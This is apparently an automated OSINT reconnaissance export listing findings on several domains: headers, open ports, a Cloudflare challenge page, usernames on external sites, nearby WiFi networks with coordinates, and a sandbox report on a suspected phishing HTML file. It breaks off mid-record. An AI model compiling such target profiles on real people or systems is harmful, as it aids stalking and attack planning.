| 2023-05-12 02:53:56 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["8F4E:438C:28D6A76:39C4C57:645DA4A1"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100090-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683858593.452046,VS0,VE24"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8d-239b\""], "X_Fastly_Request_Id": ["bf30db8298ebcbd37ba35a7187f0fd669e8117db"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8001::153 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.124): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=Altpapier | Altpapier |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | rtsmith134 (Net ID: 00:01:24:F0:37:68) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.197): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:3E:F2:BC) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PLXDevices (Net ID: 00:06:66:30:03:AC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f8c59d97743e3-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:22 | Co-Hosted Site | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | memrise (Category: hobby)
https://app.memrise.com/user/ayhu/ | ayhu |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:8080 | 188.114.97.0/24 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 2 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="49Idt7TVQjX1pBvRrI.6aeE3rlIvevuAC7b5vTR0YGE-1683860053-0-AY2CmFGtsZtnLcnB3KaVSnayJydAFpMBwiHerGE4rgR3JSYE2THMUlIcqEG1Ue8w91NqXc1_LHx6GFVlXiEAESIr_nGQ5go_qchKEn3Zd9LGEn7sjdr5MGswrCl99ImQfUgu6KdI_WivVs4bd90GT85W3eqgKUj3u0FUHAfgMsZls8XQdBKgHld4LM0wMOiwkj4Zv_skkfuoeKho_dzt4CkE8TkBrPt00M8eIbThaadGvVY0ZXacJCnFJrMWgEfguZYQYUBYVuQPCo4vsaoC9FJto9c6wa1TZj17T__0EGfb7iIg-Fe40vQL0GKl1g68OrtJF7bhLP5OSmmfJD-JBdOEbpA042KC5D5FyslCSfE7VL_rZtwmaMGkKhFs9rNjkGtzvRpQkvZRYfyEeWln9xUv2AoyKgo_1wsNTA_ve-XNzmkKtYDqJDpKDva2W3pJ_3486t1fxBPGklTfmIx9NlGkUpFz141VY7sqmJxOdPADiSQrKzSt-fovaHrioNcpkC_a9kgYIR8XX9ZtGjpkxl_IolwlzL--CdPxkW0zMtKJ-ob6rp2YNV1BUrgbluir9hqadqgAXGwt_gZWou60RMf3UaSZgv32iteEpLg55lWyX9LlrUvEr69WGY_mW2VC6sS9celjhcxiPOQLUkE6KOI9dyhMsK_hvZhX7dDzQsZTH4jAvHUf9CQD2LuSWPV3IPZysl2v0-TSOr10-QdcM27ziun4ot0DvTudFu8lZubQ6YgSwrTQ0wlCjvSq6gwpTOqihrt99F-QaEJWo9sY1ul0FhgMesYynTr4n3snoOM31ZGsLMXWKlkFnwUy1gZdrnW6lGoCkCZNGJjETZCrO0I1-blCIjRzIo6n3EQP7MT5qxAPdJn4-285kyLwMrAm9nW0Fi-T32j1LOogUb6WyPmjQkstsoGMIPyZHJWu0K53P0Hp3SPyKBDSdN4PFWJ5HhYglCXZ4frWkFfTdPf1mz5N5hMALh4FLKDLHit2KyOqpzy4LGkpslmmSQV9AzBKoRj1GEO_-FcLHTt9Y_hlt3lZHsDBr1qsBzb2CCXFE8o-Cu7OAduNH_CAS2sCSdUmt1KpWrCRaId6zphb5lrgZKo6-UG1p8eW6scfDanDgxE_uwAeJyjUHxAEdnSiE1KEwJ9jCVqAgp9dVVHeTI4rz44dE3vG-URKonk4rAmwzUrgRitO_d4uGYtEZ4E7qxVnEHPqSPPlSj7XCukbKVCLBJxrlSwrndqrFnPWXTVbd4VDbjuKYax1pPS7eYUGT_UeCCeppPOHUje3Psa1ejipoF94FUlnfTdlsYbhNQHOKrCLTleuO-lGh4FkydbCaYMbMeAAZyBt0xtAetQyd7ldNHUNuC2Nofi66SO1NL6dsaVskjPRRnE6ZvIpqMSXLJLgGQGDosioOi4TetnoLMpoodURiB_nIbRVwEcdjLeqlr_heAlhB9DjGpMi7U2THwVCr2WtE0eC7jgUi7EvjeNq152r1Qqg397yfToV5_wu059jWgynPgNUwC4lcn5G-MBIXveyQXm1Kc3wCLL9zpH8MAPvrg7a-sB2jNRF-Z6W26XqIgEKRCWc-Pxvv_Wf4vRraOQIcroiI7Bz-VZanQ8qRRCNJq9kL7QMtAUM-80bmDBTJgrVoo5PdyUEhsNJHqX9OXSul2XByOb4cFHCten8oYXlq-xQqbPW5cLy025uWQytdBIECEqK0e5vKcu_KE0Uj51a0tZyH3JcwbPPE_fH4pbZorm5Kg1q7pYpinkOp5o93d4llyQL17ps--AQEqRvOWDfy9ih2KJc_BE5lNLHq-v1h4WyL3qch3dFUNrf6TKv44d5E5ZODSf9MR91_YJ1LP3HF-0gnEEbwwFvu5w7kqPMreWbivd9zybQFoONhHZIvue3MsgjfZ1vLvfzi0_pLzPV9XnL3aZnuVWNQ5m-tjTF6DVwD4heQQWtO8aBzn7YpoO7pmb5XcFPRZknXUl9vyibdHsym3ALRgx4Xf0sXY0Egq8vPrGtUmUt_qhEJTk5P3R0wsoRFa49pkuv79cmFbVV6UYUcsY_Ht1FZEPOAMMuij1BfHolOncuoa8HH91s4MToLK5e4ZXLCuwnrhU1Iz07g8_F8FiO-szvC0BSEfX52p_c3LsFOQ8KHGFOOtlIbkgQfFx7vErT1y0UZSuoR1HN5mwxz005itrk8qw-cU_4QXYVr0nnwhQQexYkVxHYLRxlHlGu9xonuO_9eyVCe8GyN79j4Enif4_dFDplAW77cjHRHWhMTCE5n_dU-96YMnkyFZr2m1KSUUWqQndQzduR6sMHEDQuErbPvLqIaJ3xphVgcTAzrMD12jvSU-bukvEL-wHHmzTDiCAItW9qw0XBzVZ7Ll736rJi4i9XorZ16wxKlOhw9SC6r707lQ43XMPgmmt8I71p5Y7NNqy-niBv8MJGeGRjObImH8n6JVBEQ7vEkMfTCD53zst2b-4V3RTMfSwntBlaoqZZYZdNBZBlFTqFK5PeKUk6cNexkn95wQmcJcuYO0vxq3IUpP6X">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TetCTvIHDoj9yN1Q4CtSp4oIXaz0U+HIhBy4s5iV5musPrd3qRRyHc90BWI/jzQYM3TsRZmdrYIIHsGBQ3rbPW3lOoqcfi5CawfhzjAeMsvCOqeqTs713ExQ08oz+vVkhRriZ7KOQkOV4gBocW2cG02BuWOMw473YNbayiyCJXNB9iidY4XwtRQU/oWv27be04lXHovk9dndBeKEBgbit5s9pMfaIl2tziG8KWxKRTXRRw94m0HSrFr22Qs7or0V3+F4nT0oqiT9CcwY4AtGAb1j1UI+nGhI1ep4c+HVRPQEv5JYmnedW8parB9/FBeu/+bgHoTPsvVjRcT+Zj3bh9L0pk5dvmAuwrAT2+Y12w3HYJ8EUaGW5hUxEwUm3qO45VrjFOfVZH1XXhpCDpIgdaMP38+Gmi8gCSX1fmRmElBR13XOvdIqlcHPrE3eBXTlLOzhqpjHznAyvR3aMgy5C0JAffwSrtelgLWCQTUkAhSVivNH0wfno5PZypoOVrpGZ9n0kycNgQnfvHpFI9kAmKT2MlQ1LuH6zqEPZLkiqKrLJjogiPERqj0XyjcrK42c',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Lang Sky Harbor (Net ID: 00:03:93:E9:7A:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:40 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.109.154 | 185.199.109.153 |
| 2023-05-12 02:46:38 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 34.74.160.0/20 | 34.74.170.74 |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0101kvmt.github.io |
| 2023-05-12 02:54:20 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06PCVJ4HBKTDMM1V2TTSTEZ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 7 | 0 | 2 | 0 | None | https://nwapi2.battleb0t.xyz/ | nwapi2.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:5F:88:E4) | 40.2024, 29.0398 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:47:46 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.74.170.74:80 | 34.74.170.74 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2086 | 188.114.96.1 |
| 2023-05-12 02:44:58 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.110.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.110.153 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} | http://ayhu.xyz/ |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00p513-dev.github.io |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | snowzef (Net ID: 00:01:36:07:D6:9C) | 52.3759, 4.8975 |
| 2023-05-12 03:11:19 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Bursa, Bursa, 16350, Turkey, Asia | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | OMNI (Net ID: 00:06:25:FA:6F:A7) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:39 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.108.153:80 | 185.199.108.153 |
| 2023-05-12 02:56:16 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | www.ayhu.xyz |
| 2023-05-12 02:52:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'YPO - Certified Act of the Ordinary Assembly.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a14_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_a14_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a14_ConnHashTable<2580>_HashTable_Mutex"\n "IsoScope_a14_IESQMMUTEX_0_331"\n "IsoScope_a14_IE_EarlyTabStart_0x344_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2580"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "142.250.191.74:443"\n "142.251.46.225:443"\n "207.58.149.159:443"\n "185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "lh3.googleusercontent.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "adbred_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF55.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"loading_1_.gif" has type "GIF image data version 89a 144 x 68" and extension "gif"\n "back_1_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1694x953 components 3" and extension "jpg"\n "pAxMM_1_.png" has type "PNG image data 160 x 14 8-bit/color RGBA non-interlaced" and extension "png"\n "microsoft_1_1_.png" has type "PNG image data 48 x 48 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002776]\n "Cab1689.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1689.tmp]- [targetUID: 00000000-00002776]\n "CabF44.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabF44.tmp]- [targetUID: 00000000-00002776]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df1354a31362cff700.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{f19685c7-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{f19685c9-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe53b5c5f3cc72065.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df1354a31362cff700.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{f19685c7-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe53b5c5f3cc72065.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{f19685c9-eaba-11ed-831b-080027c8d963}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"adbred_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002580]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00002580]\n "urlref_httpqueryfibre.github.iov4seizle.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00002580]\n "loading_1_.gif" has type "GIF image data version 89a 144 x 68"- [targetUID: 00000000-00002580]\n "TarF55.tmp" has type "data"- Location: [%TEMP%\\TarF55.tmp]- [targetUID: 00000000-00002776]\n "sip_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00002580]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00002580]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002776]\n "d_2_" has type "Web Open Font Format CFF length 31000 version 0.0"- [targetUID: 00000000-00002580]\n "d_1_" has type "Web Open Font Format CFF length 30852 version 0.0"- [targetUID: 00000000-00002580]\n "d_1_" has type "Web Open Font Format CFF length 30812 version 0.0"- [targetUID: 00000000-00002580]\n "~DFE63417DCA6F3BF5E.TMP" has type "data"- Location: [%TEMP%\\~DFE63417DCA6F3BF5E.TMP]- [targetUID: 00000000-00002580]\n "back_1_1_.jpg" has type "JPEG image data JFIF 